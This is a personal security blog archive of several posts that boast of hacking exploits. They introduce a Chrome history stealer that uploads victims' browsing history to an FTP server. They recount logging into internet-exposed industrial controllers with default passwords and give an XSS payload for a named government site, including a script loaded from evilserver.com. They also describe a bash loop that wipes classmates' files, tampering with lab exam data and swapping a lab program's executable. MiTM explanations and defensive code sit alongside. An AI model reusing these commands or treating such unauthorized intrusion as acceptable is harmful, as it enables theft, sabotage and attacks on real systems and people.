Category Archives: Security

historyStealer

I have started writing some malicious code for fun lately. The first one is a chrome history stealer. As the name goes, it uploads the history file to a remote FTP server of the attacker’s choice.

Why History?
I believe in this quote

“Show me a man’s browser history, I will tell you who he (is) (was) (will be)”

Browser history is one of the most sensitive pieces of information on your computer; it can be as sensitive as a passwd file, simply because of the amount of time people spend on the Internet. Going through someone’s browsing history is like popping open their brain and walking right through it. The whole human thought process can be visualized by examining a browser history.

Okay, you’ve got me watching pr0n, is that it?
Browser history contains more interesting things to analyze than just whether someone is watching pr0n or not. It is like robbing a car parked in the garage of an unlocked house, instead of going for the whole house. Browser history contains patterns: what you like, what you don’t like, what you do when you are happy, what you do when you are sad, who you stalk on Facebook, all the shameless ‘How to’s’ you googled for. In fact, this is the pattern which Google uses to determine which ads are appropriate to display for you. In other words, the Internet’s browsing pattern is worth 42 Billion $.

The pattern can be used to predict behavior, uncover lies, expose desires, determine knowledge and even more. A wonderful research area would be to work on generating a model based on browser history which would determine/predict/assert possible actions that might be taken by the owner of the browser history.

Code:
I decided to write this one in C#, to stay in touch with it since my initial encounter with it last summer. A throwaway free hosting account is all you need to get started with this. The downside of free hosting was that I could not have a single file of more than 10 Megs in size, hence I had to compress the file before uploading.

DISCLAIMER: Do not run this code on a machine without the owner’s permission. For education purposes only.


Quora’s anonymous answers and Facebook Graph Search

The reason for providing an anonymous answering functionality is to prevent someone from tracing the answer back to you (perhaps to prevent a flame war, or you getting fired, or God knows what could happen). But if you give reasonable information in your anonymously written answer, that information, in combination with your badly configured Facebook profile, can be quite lethal to you.

Let us take this answer as an example. From the question and the answer, anyone can understand that the OP was a student at College of Engineering, Guindy, an ex-employee at Voltas and a current student at North Carolina State University.

The below mentioned Facebook Graph Search query seems to pick out the right individual:

People who studied at College of Engineering, Guindy and worked at Voltas and study at North Carolina State University

It is evident that people are not quite aware of the involuntary privacy leak through their Facebook profile; there is no reason why you have to make all this information about your grad school and previous employers public. People may say it helps their lost friends get back in touch with them, which I agree with, but at what cost?

Facebook Graph Search is a double-edged sword: it can be quite useful, as it was to me when I used it to reunite with a family friend after nearly 14 years of no contact, and equally dangerous, as in the anonymous poster’s case!

PS: This post has nothing to do with my recent outrage against CEG. In fact, I agree with the OP’s answer 🙂

The Internship

If you are looking for a heads-up review of the upcoming movie ‘The Internship’ then you are probably in the wrong place, but I wouldn’t force you to skip reading this post. This post is rather a dramatic one, a collection of events that happened during the last couple of days in my life, which led to a Summer Internship offer.

Winter break of 2012-13: I was looking for an online stock market simulation game, like the good old rediff money, to practice my trading skills, but had no luck in finding one; most of them were paid ones and the rest were absolute BS.

Early March 2013: Vignesh’s Facebook feed showed something interesting: he was using an iPhone app, which was exactly the one I was looking for. What to say, ‘like minds think alike’.

Early March 2013: I made some wise investments and already started reaping profits, with an almost constant 3% ROI.

Mid March: Thanks to my third quarter examinations, which coincided with Cyprus’s credit rating getting downgraded to crap, I was not online for a couple of days till my exams got over, and guess what, every stock I had suffered a 7-10% loss. Vignesh made a smart move to sell them when they started to fall and decreased his loss ratio, but I crossed beyond that point and made almost a 2K$ loss in a week.

27th March (WhatsApp conversation):
……….
……….
Vignesh: Flaw with ———-
Vignesh: I found one
Me: To change the values?
Vignesh: 28% Increase
Me: How come?
Vignesh: It showed 14% when i was about to sell but after selling it showed a 28% increase
Vignesh: Probably because of bad internet at college
………….
………….

28th March: I started to pentest the application, had a breakthrough the first day, but wasn’t able to exploit anything.

29th March – 2nd April: Was hanging out with Sathya anna and his TCS folks at Gothenburg. I was explaining my area of interest in security to Kaushik, who happened to be a program manager/consultant in TCS, and suddenly an idea to exploit the app sparked in my mind.

2nd April: Successfully exploited the app and had an ROI of 432% 😛

3rd April: Contacted the Lead developer of that app to report security problems

3rd April: Received an e-mail from the CTO of that company thanking me for reporting it, along with a possible employment offer.

3rd April: I showed interest in working with them.

3rd April: I was asked to take an ACM-ICPC style programming test, which I took the same day at midnight.

4th April: Skype Interview with the CTO and a formal contract was offered.

Credit goes to Vignesh; if it wasn’t for him I would have never used this awesome application, and if it wasn’t for his WhatsApp message, perhaps I would have never thought about testing it for flaws.

Low-Medium Critical Infrastructure Security

As the Internet says

                              Security is as strong as its weakest link.

While researchers are busy analyzing Stuxnet and Duqu, there exists a wide range of ICS on the Internet with relatively little or almost no security at all. Current research covers just the high critical targets, while low-medium critical targets are almost ignored. I wouldn’t say that the strategy of the researchers is wrong; they are right, it is the right choice to protect an oil refinery from an intruder rather than the water treatment plant of a golf course. It must be the responsibility of the vendors to protect against such attacks; actually, it doesn’t require that much path-breaking research to protect these (low-medium critical) devices. The right architecture and the right configuration are all it needs to secure them.

I don’t know how many would believe me if I say I have seen this thing many times before the news even broke out. It was just hanging around in Shodan. The default password was 100 or 101, I believe, if my memory cells are still intact. One does not need a sophisticated NIDS to protect the infrastructure of these devices, since they are hardly being targeted by industrial/political espionage or terror attacks. People who hijack these devices are simple script kiddies or psychopaths.

I’m not saying that the security of low-medium critical systems should be taken lightly, but instead of leaving it alone just like that without any protective measures, for the time being I think a few very basic solutions by the vendors or the infrastructure admin might keep those script kiddies away.

By basic solutions I mean:

* Make VPN support available out of the box

* Banner display to show last logged in time, IP and host names.

* Strong passwords

* Clean or deceptive banners, after all that is how Shodan identifies you.

* Strip out legacy services like FTP, SNMP.

* A sticker which says “Do not connect this thing to internet without a basic VPN” 🙂

MiTM

MiTM attacks on Open WiFi Hotspots

Since it is so trivial to set up WiFi hotspots as open networks in order to reduce the complexity of the infrastructure setup, a question arises: how can one remain safe from MiTM attacks which take advantage of the inherent trust between the connecting client and the Access Point? As Vivek Ramachandran says in his series of WiFi security primer videos, there is no way for the client to authenticate the Access Point to which it is connecting.

If you are a novice in wireless security, then the first paragraph might sound like a Selvaraghavan movie; I’ll explain how MiTM attacks are performed on open Access Points [WiFi hotspots, to be precise].

MiTM is popularly expanded as Man in the Middle attack, or you can use Hak5 Darren’s expansion, Monkey in the Middle attack. In the case of an open network, all the data as well as the 802.11 (WiFi) management packets traveling around you in the air are unencrypted, though the management packets are unencrypted even in WEP and WPA networks, but that’s a different story.

A few of the management packets are:

* Beacon Packet
* Probe Request, Response
* Authentication Request, Response
* Association Request, Response
* Disassociation Request, Response
* Deauthentication Request, Response

In order to perform a MiTM attack the attacker must make the clients connected to the original AP connect to him instead. The attacker can achieve this by continuously performing a deauth attack on the access point, thereby disconnecting all legitimate clients from the legitimate AP, and using airbase-ng to set up a fake AP with the same name as the legitimate AP, thereby attracting the users towards him. The signal strength need not be higher than the legitimate AP’s, because the legitimate AP is hammered by a continuous deauth attack.

Assume that the WiFi hotspot’s network looks like this and the network name is freewifi. In the normal working case, the client happily connects to the freewifi access point and transfers data.

The attacker may start sending deauth broadcast management packets for the BSSID of freewifi, thereby making all the clients disconnect from the freewifi access point.

Next the attacker sets up his own Access Point with the name freewifi, but with a different BSSID, using airbase-ng. Since the attacker’s fake AP advertises itself as freewifi, the client goes ahead and connects to the attacker’s AP. This is where the inherent trust of the client in the AP is exploited.


Now the client is connected to us believing that we are the freewifi access point and sends its (unencrypted) data to us; we happily intercept the data, monitor it, and forward it to the Internet through our own uplink, either a 3G phone or a data card. We have the option to tamper with, monitor and modify the user’s data.

Detecting MiTM Attacks:

So now, if we have something on the host (client) computer that verifies the AP’s BSSID (MAC address), it would be easy to spot a MiTM attack. You may think, “MAC spoofing is a piece of cake, and what if the attacker launches his duplicate AP with the same BSSID (MAC address) as the legitimate one? The verification mechanism will be rendered useless, right?” My answer is yes, but no. If the attacker changes the BSSID of the fake AP which he created using airbase-ng to the same one as the legitimate AP’s, he would end up deauthenticating the clients of his fake AP as well, since both APs would then share the same BSSID. So technically, unless the attacker has a high-gain directional antenna, he would not change the BSSID of his fake AP to reflect the original AP’s.

Now, I plan to follow this up with a Python daemon program, which manages a file with a list of APs along with their BSSIDs, so whenever you are connected to a network it checks whether you have previously connected to that network or not. If yes, it checks the BSSID, which will be different in the case of a MiTM and the same in the case of normal usage.
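As an added example (not the post’s own daemon, which the author had not written at the time), here is a minimal Python version of that idea. It parses the output of `iw dev wlan0 link` on Linux, keeps an SSID-to-BSSID list in a JSON file, and reports a mismatch when a known SSID shows up with a BSSID that was never seen before. The interface name, the store path and the sample `iw` output are assumptions constructed for the example.

```python
import json
import os
import re
import subprocess
import time
from typing import Dict, List, Optional

# Assumed location of the known-AP list (not from the post).
STORE_PATH = os.path.expanduser("~/.known_aps.json")

# Constructed sample of `iw dev wlan0 link` output; not captured from a real device.
SAMPLE_IW_LINK = (
    "Connected to 00:11:22:33:44:55 (on wlan0)\n"
    "\tSSID: freewifi\n"
    "\tfreq: 2437\n"
    "\tsignal: -52 dBm\n"
)


def parse_iw_link(text: str) -> Optional[Dict[str, str]]:
    """Pull SSID and BSSID out of `iw dev <iface> link`; None when not associated."""
    bssid = re.search(r"^Connected to ([0-9a-fA-F:]{17})", text, re.M)
    ssid = re.search(r"^\s*SSID: (.+)$", text, re.M)
    if not bssid or not ssid:
        return None
    return {"ssid": ssid.group(1).strip(), "bssid": bssid.group(1).lower()}


def current_link(iface: str = "wlan0") -> Optional[Dict[str, str]]:
    """Query the live interface (Linux with the `iw` tool installed)."""
    out = subprocess.run(["iw", "dev", iface, "link"],
                         capture_output=True, text=True, check=False).stdout
    return parse_iw_link(out)


def load_store(path: str = STORE_PATH) -> Dict[str, List[str]]:
    """SSID -> list of BSSIDs seen for it; empty store if the file does not exist yet."""
    if not os.path.exists(path):
        return {}
    with open(path) as f:
        return json.load(f)


def save_store(store: Dict[str, List[str]], path: str = STORE_PATH) -> None:
    with open(path, "w") as f:
        json.dump(store, f, indent=2)


def check_ap(store: Dict[str, List[str]], ssid: str, bssid: str) -> str:
    """'new': first time this SSID is seen (it is recorded); 'known': BSSID seen before;
    'mismatch': same SSID but a BSSID never seen, which is what the airbase-ng
    fake AP described in the post looks like from the client side."""
    seen = store.setdefault(ssid, [])
    if not seen:
        seen.append(bssid)
        return "new"
    return "known" if bssid in seen else "mismatch"


def trust_bssid(store: Dict[str, List[str]], ssid: str, bssid: str) -> None:
    """Let the user accept an extra BSSID for an SSID, e.g. a second AP of a campus network."""
    store.setdefault(ssid, [])
    if bssid not in store[ssid]:
        store[ssid].append(bssid)


def watch(iface: str = "wlan0", interval: int = 10) -> None:
    """Daemon loop: poll the link and warn when a known SSID changes BSSID."""
    store = load_store()
    while True:
        link = current_link(iface)
        if link:
            verdict = check_ap(store, link["ssid"], link["bssid"])
            if verdict == "mismatch":
                print(f"WARNING: {link['ssid']} now served by {link['bssid']}, "
                      f"previously {store[link['ssid']]}; possible rogue AP")
            elif verdict == "new":
                save_store(store)
        time.sleep(interval)


if __name__ == "__main__":
    watch()
```

A BSSID change is a signal, not proof: campus networks legitimately serve one SSID from many APs, so the store keeps a list per SSID and `trust_bssid` lets the user accept a second one after checking with the network owner; and, as the post notes, a BSSID can itself be spoofed, so this catches the cheap fake-AP setup rather than a determined attacker. `watch()` only works on a Linux box with `iw` and a wireless interface.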

University Lab Fun (in)security

As an ex Electrical Engineering student, I didn’t have opportunities to take many computer science lab courses, as neither the course work nor the electives were flexible.

You know it, right? It’s ANNA UNIVERSITY.

But, thanks to the IT boom, I had:

  • Fundamentals of Computer Lab
  • Data Structures Lab
  • Object Oriented Programming Lab
  • Communication Lab [English]
  • Power System Simulation Lab

Let me walk you through the fun stuff which I/we had during these labs.

Fundamentals of Computer Lab:

As I was a fresher, I stayed below the radar and didn’t try anything adventurous. So it typically went like normal lab sessions.

Data Structures Lab:

The lab was entirely based on C, so we were given a unique user id and password, which was merely our roll number [ee199 is mine]; sadly there was no provision to change the default password. The user id and password were for mounting the user-specific directories on the system, so that students could store their programs on their respective shares. As I was a sophomore at that time, I limited myself to logging into other users’ accounts and deleting their programs, nothing other than that, because I was a bit of a coward at that time. Yeah, you read it right, I was a coward at THAT TIME.

Object Oriented Programming Lab:

We did C++ and Java; it was the third year and I was peaking in presentations and coding competitions. The only difference between the data structures lab and the OOP lab setup was the GUI. We had access to Windows ME machines in the OOP lab, whereas in the DSA (Data Structures and Algorithms) lab we were given DOS & Turbo C. The storage part was lamer than the previous lab, as the programs were saved in \bin\ of the C drive, and guess what, the C drives were shared over the network, so I just had to browse down to a specific user’s bin directory [//system22/c/] and change his/her programs to some random shit, like displaying weird characters on the screen in different colors and running through an infinite loop.

However, during the later part they [the system admins] were smart enough to change the program storage/execution directory to an NFS share, which used to get mounted at login time. But they were not smart enough to change the password of the server to anything other than “peccc5lab”, so my job became easier: Start -> Run -> //cc5server/c$/eee would list all users’ directories from ee101 to ee230 where their programs are stored. Pwnd!

Communication Lab [English]:

It was the same laboratory as the OOP lab, and the lamest lab which I had. It was something similar to the TOEFL exam: the questions used to be generated from a database, and the database file was luckily running from the cc5server which I mentioned above, so I was able to change the questions to anything I wanted. The funniest part was that I could have even done the same for the university exams. The procedure was to send the users database file to Anna University, in which the marks were present according to the answers they provided. Before the university exam I had the opportunity to view the users.mdb file [//cc5server/c$/exam/users.mdb]; surprisingly the marks were encrypted. I thought of copying the encrypted value of my class topper to mine, but what if the marks were encrypted with the roll number as key? So, if I had swapped my marks, it wouldn’t have been possible to decipher them, and I would have landed in a lot of trouble, so I refrained from doing it. I even tried to take a look at the .asp file which pulls the questions and reports the answers back, but time didn’t permit, and the staff walking around the lab were watching me as if I looked like an alien.

Other than this, I used to cause havoc between students using net send commands. It was a simple trick: as the C drives used to be shared, I used to change the autoexec.bat of system-y to something like

	@echo off
	net send system-x hey as***le !
	start c:\elclient.exe

and change the shortcut link for the EL client to open the autoexec.bat file. So when the user on system-y opened his EL client, system-x used to receive a message displaying “as***le!” sent from system-y. So it was fun to see the users on system-x and system-y fight with each other.

PS: EL client is the software in which we used to work; I hardly opened that software.

Power System Simulation Lab:

I have already blogged about this, you can check it here.

Operating Systems Lab at SVCE:

Thanks to Jump Start 2 for bringing back the fun part again. This time it was the OS lab and we were taught basic Linux commands like ls, chmod, cat, editors [vi] [for some reason the instructor never mentioned emacs; emacs FTW], and some pretty basic stuff. It was easy for me; no, I’m not blaming the instructor, they had to cover each and every student, and many of them did not have any idea about either Linux and computers or the Rankine cycle, but they used to brag that they were the mec*sterz, meh. But she [the instructor] did not ask me to close my terminal, in which I was teaching my friend about grep and pipes. Never mind. In the exercise, each user was asked to create files in their home directory, i.e. exam01…; exam01 was the username given to 90% of the users in that session. Again it was an NFS [Network File System], so the files created by each user started appearing in every user’s home directory, and some mothafucka created files with filenames that hurt my friend. So the evil inside BORIS stepped out to cook up a bash script [evil.sh]:

	#!/bin/bash
	# infinite loop: wipe the shared exam01 directory once a minute
	for (( ; ; )); do
		rm /exam/exam01/*
		sleep 60
	done

chmod a+x evil.sh

../evil.sh &

and the charming script was running in the background, deleting every file users created to learn in that lab. I’m now guilty of making the OS lab useless for everyone; I wouldn’t have done it if the file names were not that rude.

PS: If you are creating a lab environment for students, then better rely on NFS with different passwords per user, or share less of the local system disk, with limited user privileges.

PPS: Try these at your own risk.

That’s it for now. I’m tired of typing since 6:30 pm, and now the time is 9:09 pm. Thanks to Vignesh for editing this post.

Good bye, alvida!

SCADA/ICS Insecurity

Hi guys, long time no see; I’ve been busy with placements, FYP, people bragging about the offers they’ve got, a really sick time.

Recently I was questioned by the University at the project review for choosing a project in a computer science stream while I’m in EEE. To prove to them that it was not merely a computer science project I did some research, and guess what, it was astonishing; I’ll share a few details about it in this article.

With the advancement in technology and the Internet flourishing, people want all their products, ranging from iPod to SUV, microwave oven to toilet closet :P, connected to the Internet, so that they could access/control/monitor them from anywhere. The advancement in technology has not only changed the public’s mindset but also the corporate mindset. Nowadays every manufacturing process in an industry is controlled by automated systems [Industrial Control Systems (ICS)/Supervisory Control and Data Acquisition Systems (SCADA)]. These ICS are also SOMETIMES connected to the Internet. I still could not figure out why the hell they do it. A typical Industrial Control System network will be like this [It might be a bit complex, but this is a rough representation of it.]

[Figure: SCADA Architecture]

The RTUs [Remote Terminal Units] are now usually PLCs [Programmable Logic Controllers, a hybrid RTU with reprogramming capabilities]. To put it simply, a PLC is something like an advanced microcontroller which can directly interact with industrial components like boilers, pressure sensors, turbines etc. DAS is usually a database server which is used for data acquisition. Typical data logged into the DAS will be something like boiler temperature and pressure with respect to time, and some other necessary parameters.

HMI [Human Machine Interface]: It is a central server with huge monitors connected to it, displaying the various processes going on in the plant. It is also used to command and control the PLCs. These HMIs nowadays come with a webserver-like setup, so that the supervisory team of the power plant/industry can connect from their desktops to this HMI server. Sorry for boring you guys; I know an electrical engineering lecture will always be vague. Let’s get into the security part.

My aim was to prove that SCADA systems would pose a huge risk if the network admin neglected to block Internet access to the HMIs or even to some other controllers.

Day 1: Started searching for SCADA systems; it was something like searching for a nanoparticle in an ocean. Tried using Google. Later that day I remembered something which I had really missed for a long time, and it’s none other than the SHODAN search engine. I was glad to see that someone had already posted the search queries for several SCADA systems in Shodan’s popular search tab. I took Schneider’s TAC Xenta controllers as a test sample for my research. And Day 1 ended with a bunch of IP addresses from SHODAN.

TAC Xenta is a product of Schneider Electric which acts as a controller/connector for numerous RTUs running over MODBUS/C-Bus/BACnet and a variety of protocols. It collects the data from these devices and integrates it with LonWorks to provide a real-time feed of what’s happening in the infrastructure.

Day 2: Tried logging into it with some common passwords, scanned with nmap, everything ended up in vain. Suddenly I thought of an idea: why not try finding the documentation of the product, as the exact version number is displayed on its login page. Before proceeding further I was daydreaming of myself social engineering the company’s marketing team into handing over the documentation of the specific version of their product by impersonating a potential buyer. But sadly I was able to find the product’s documentation by just googling it [TAC Xenta 913]. I found the default password after reading about a quarter of the documentation. On testing the default password against the bunch of targets I had, many systems granted access. After reading the documentation I learned that the device also comes with an FTP server.

ftp> open X52.X.1X.2X
Connected to X52.X.1X.2X.
220 FTP Server Ready
User (X52.X.1X.2X:(none)): xxxx
331 Password required
Password:
230 Logged in
ftp> dir
200 OK
150 Opening connection
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 ram
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 sys
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 www
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 mmc
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 configdb
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 wm
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 tmp
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 user
drwxrwxrwx 1 usr usr 0 Aug 21 12:41 inet
drwxrwxrwx 1 usr usr 0 Apr 23 09:11 fb
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 event
226 Closing connection
ftp: 458 bytes received in 0.02Seconds 26.94Kbytes/sec.
ftp>

This is the web management console of the Controller.

pwnd

So if it is this simple to intrude and take over an Industrial Control System or a home automation system, or at least a part of it, Stuxnet is too small a thing to worry about. Seems Die Hard 4.0 will no longer be just a science fiction movie; reality is on the way.

NASA has it, And so Does DRDO

NASA has it, the FBI has it, most of the Govt agencies/organizations have it and DRDO also has it. What is it?

Well, that’s the most common security flaw in web applications: “THE XSS (Cross Site Scripting)”. XSS vulnerabilities are due to improper or missing sanitization of input variables in server-side scripts, which leads to external/embedded JavaScript being executed in the client-side browser.

Vulnerable URL:

http://www.drdo.gov.in/drdo/labs/CAIR/English/index.jsp?pg=<script>alert('XSS is here');</script>

The vulnerability lies in the index.jsp page; the variable “pg” is not properly sanitized, that’s why it allows arbitrary JavaScript to be included. But the good thing here is, it does not allow remote JavaScript to be run.

http://www.drdo.gov.in/drdo/labs/CAIR/English/index.jsp?pg=<SCRIPT/XSS SRC="http://evilserver.com/xss.js"></SCRIPT>

The above script will not work because the administrator at DRDO was smart enough to set the REMOTE INCLUDE [something like that, I forgot the exact name] to DISALLOW in the Apache server configuration; that’s why only scripts within the host directory will run.

If the above setting [remote include] had not been done, another serious vulnerability would have been induced: RFI [REMOTE FILE INCLUSION].

From the above URLs it is pretty obvious that index.jsp’s pg variable includes the local JSP page [awards.jsp/Director.jsp] in the frame, so if the remote include feature had been set on, we could have uploaded a JSP shell script on our server and included it inside index.jsp, so that it would get executed on DRDO’s server and w00t, DRDO would have been r00t’ed.
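As an added example (neither DRDO’s code nor the post’s own), here is the shape of the `pg` dispatcher described above, written in Python, with the reflecting/including version beside a hardened one. The fix is the same whether the include target is local or remote: `pg` is looked up in an allowlist of page names and is never used as a path, and anything echoed back to the browser is HTML-escaped. The directory layout and the allowlist entries are assumptions; the page names come from the post.

```python
import html
from typing import Optional

# Assumed allowlist: the page names the post mentions as being framed by index.jsp.
# Only names in this set may ever be turned into an include path.
ALLOWED_PAGES = {"awards", "Director", "index"}
PAGE_DIR = "/var/www/cair/English"   # assumed layout, not the real server's


def resolve_page_vulnerable(pg: str) -> str:
    """The pattern the post describes: whatever 'pg' says becomes the include target.
    A traversal string or a URL reaches the include call unchanged (LFI/RFI)."""
    return f"{PAGE_DIR}/{pg}.jsp"


def render_vulnerable(pg: str) -> str:
    """Reflects the raw parameter into the response: the reported XSS."""
    return (f"<html><body><h1>{pg}</h1>"
            f'<iframe src="{pg}.jsp"></iframe></body></html>')


def resolve_page(pg: str) -> Optional[str]:
    """Allowlist lookup: an include path only for a known page name, None for
    anything else (traversal, URLs, script tags, empty values)."""
    if pg in ALLOWED_PAGES:
        return f"{PAGE_DIR}/{pg}.jsp"
    return None


def render_hardened(pg: str) -> str:
    """Never reflects the raw parameter; even the 'unknown page' message carries an
    escaped copy so it cannot smuggle markup into the response."""
    path = resolve_page(pg)
    safe_name = html.escape(pg, quote=True)
    if path is None:
        return f"<html><body><p>Unknown page: {safe_name}</p></body></html>"
    return (f"<html><body><h1>{safe_name}</h1>"
            f'<iframe src="{safe_name}.jsp"></iframe></body></html>')


if __name__ == "__main__":
    probe = "<script>alert('XSS is here');</script>"
    print("vulnerable:", render_vulnerable(probe))
    print("hardened:  ", render_hardened(probe))
    print("traversal resolves to:", resolve_page("../../etc/passwd"))
```

Escaping alone would stop the reflected script but not the file inclusion; the allowlist stops both, which is why the hardened dispatcher does the lookup first and escapes second.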

This vulnerability was reported to keeda/null on 17-10-10.

Fun with AUPower Lab

Sssh, yet again a boring “Design of Electrical Apparatus” class, so I decided to cook up this nice little article for you all.

AU Power Lab is the software developed by Anna University’s Power Research Group for the Power Systems Simulation Lab [EE1404], which is used by most of the colleges for their final year EEE lab curriculum.

About the Application:

The application has a client-server architecture; the server verifies the license key/authentication key of the client machines. The client software, which has a sluggish graphical user interface, is written in VC++/VB6.0. The application is usually installed in “C:\AuPower”; you can find a lot of directories inside “C:\AuPower”, some of them are:

  • LFS
  • TSA
  • Acrod32 (adobe reader verison 5.0 to view the pdf help files)
  • ED, and many more

Each of the directories corresponds to a menu, which is a separate exercise in the lab curriculum.

LFS corresponds to the Load Flow Solution exercise and TSA corresponds to the Transient Stability Analysis exercise.

Inside each of the directories, i.e. inside LFS, TSA, ED etc., there will be a further 3 subdirectories:

  • user
  • sample
  • work

The sample directory contains some text files which bear the sample data given for the problem.

The user directory contains some text files which bear the data which you entered and saved in the graphical user interface.

The work directory contains the executable files which are required for running the program and computing the output.

Well, if you are lost somewhere, let me sum it up again. When you open the AU Power Lab application on your desktop you’ll be presented with several menus, each corresponding to an exercise, viz. Load Flow Analysis, Economic Dispatch etc. When you click a particular option, the respective program for data collection gets started; this program will be inside C:\AuPower\<abbreviated form of the clicked menu>\work.

In some exercises a command prompt [DOS prompt] will appear and you need to enter your options; after entering those options the program runs and produces the output.

The Fun:

Due to the lack of application security in the AU Power Lab software, it fails to verify the authenticity of the program called by the main application. It means you can create a custom executable file and replace the original with it, so that when the application is run, your executable comes up instead of the original executable.

We are going to exploit this security flaw to make fun out of AU Power Lab. Let’s use the Economic Dispatch exercise as our target 😛

Go to C:\AuPower\ED*\work (I’m not sure of this name, but it will start with something like ED)

You will see 2 files without any icon:

  • ED*L.exe [again, pardon me for not remembering the exact file names]
  • ED*NL.exe

ED*L.exe is for the problem with losses and ED*NL.exe is for the problem without losses. We have the problem without losses alone in our syllabus, so we are going to create another executable with the name ED*NL.exe and replace the original with it.

Most of the PCs in the PS lab have Turbo C++ installed, so cook up a funny C++/C program and make it into an executable.

Here is my program:

	// Turbo C++ used <iostream.h>; modern compilers want <iostream> and std::
	#include <iostream>
	using namespace std;

	int main(void)
	{
		char a, b, c;

		// Thanks to chokkalingam for teaching question tags :P
		cout << "You are not a human, are you : <Yes:y No:n>: \n";
		cin >> a;

		cout << "You are a ************ : <Yes:y No:n>: \n";
		cin >> b;

		cout << "Do u really wanna output for this programme: <Yes:y No:n>: \n";
		cin >> c;

		// only the third answer matters: a 'y' here triggers the punchline
		if ((c == 'Y') || (c == 'y'))
		{
			cout << " Dumb 'O , Im not your slave, Compute the ****** Output yourself with ur ****** Calculator \n";
		}

		return 0;
	}

Now compile this program and make it into an executable [hope you’d be familiar with Turbo C]. The executable will be in a directory “OUT” inside tc, i.e. C:\TC\out or C:\TC\bin\out, so grab your executable from here and paste it inside C:\AuPower\ED*\work. Don’t forget to rename your executable exactly as ED*NL.exe.

Now call your victim to test it; ask him/her to teach you this exercise. After entering the data, saving it and clicking run, instead of the original executable your executable will run, and see how many of your friends press three Y’s without seeing what is being displayed on the screen.

Prevention:

In order to prevent this kind of executable replacement attack, you can design the called program to send an authentication key to the main program, so that it could ensure the authenticity of the called program. However, this technique can be broken: if the attacker examines the executable file in a debugger, he could get hold of the key being passed to the main program, specify the same key in his custom program and corrupt it again, so the best bet is to use some pre-shared key exchange kind of technique.
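One way to implement the check, as an added example (not the AU Power Lab code and not the key-exchange scheme the post suggests): instead of a key that the called program has to carry, the main program keeps a SHA-256 manifest of the known-good executables and refuses to launch anything whose hash is missing or different. Nothing secret sits in the called binary, so a debugger finds nothing to copy; what has to be protected is the manifest and the launcher, which must be writable only by the lab admin. The file names and the demo contents below are constructed.

```python
import hashlib
import hmac
import os
import subprocess
import tempfile
from typing import Dict, Iterable


def sha256_file(path: str) -> str:
    """SHA-256 of a file, read in chunks so a large executable need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(paths: Iterable[str]) -> Dict[str, str]:
    """Record the known-good hash of every called executable, keyed by file name.
    Run once by the lab admin at install time, never from a student account."""
    return {os.path.basename(p): sha256_file(p) for p in paths}


def verify_executable(path: str, manifest: Dict[str, str]) -> bool:
    """True only if the file is listed and its current hash equals the recorded one."""
    expected = manifest.get(os.path.basename(path))
    if expected is None or not os.path.isfile(path):
        return False
    return hmac.compare_digest(expected, sha256_file(path))


def launch_verified(path: str, manifest: Dict[str, str], args: Iterable[str] = ()) -> int:
    """What the main program would do instead of blindly calling work\\ED*NL.exe:
    refuse to run anything whose hash is unknown or has changed."""
    if not verify_executable(path, manifest):
        raise PermissionError(f"refusing to launch {path}: not in manifest or hash mismatch")
    return subprocess.run([path, *args], check=False).returncode


def demo_tamper_check() -> Dict[str, bool]:
    """Constructed scenario: an original executable, a swapped-in replacement,
    and a file the manifest has never seen. Returns the verdict for each."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "EDNL.exe")      # stand-in for the real ED*NL.exe
        with open(target, "wb") as f:
            f.write(b"original economic dispatch solver")
        manifest = build_manifest([target])
        clean = verify_executable(target, manifest)

        with open(target, "wb") as f:              # the prank binary replacing it
            f.write(b"You are not a human, are you")
        tampered = verify_executable(target, manifest)

        unknown = verify_executable(os.path.join(d, "other.exe"), manifest)
    return {"clean": clean, "tampered": tampered, "unknown": unknown}


if __name__ == "__main__":
    print(demo_tamper_check())
```

`demo_tamper_check()` builds a manifest for a stand-in ED*NL.exe, swaps the file for a replacement, and shows that both the swapped file and an unlisted file are refused. If a student can overwrite the manifest or the launcher itself the check is gone, which is the same lesson as the lab post above: the application directory has to be read-only for students.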

Have Fun Hacking !!  🙂